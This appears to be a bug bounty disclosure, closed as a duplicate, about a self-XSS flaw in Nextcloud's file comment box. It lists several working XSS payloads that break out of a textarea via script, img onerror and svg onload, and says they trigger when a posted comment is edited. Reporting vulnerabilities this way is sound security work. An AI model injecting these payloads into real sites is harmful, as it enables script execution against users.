Reflected Self-XSS Vulnerability in the Comment section of Files (Different-payloads)
N
Nextcloud
Submitted None
Actions:
Reported by
shivakumar143
Vulnerability Details
Technical details and impact analysis
Note::steps mentioned in report#164027
In the Comments Box,the payload to execute XSS is passed.
Test Payloads:
</textarea><script>alert(1)</script>
Also the above payload is still working..
Also try this payload
</textarea>"><img src=x onerror=prompt('XSS');>
</textarea><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
</textarea><svg/onload=alert('XSS')>
</textarea>foo<script>alert(1)</script>
Click edit comment after posted.
XSS Triggers.
Report Details
Additional information and metadata
State
Closed
Substate
Duplicate
Submitted
Weakness
Cross-site Scripting (XSS) - Generic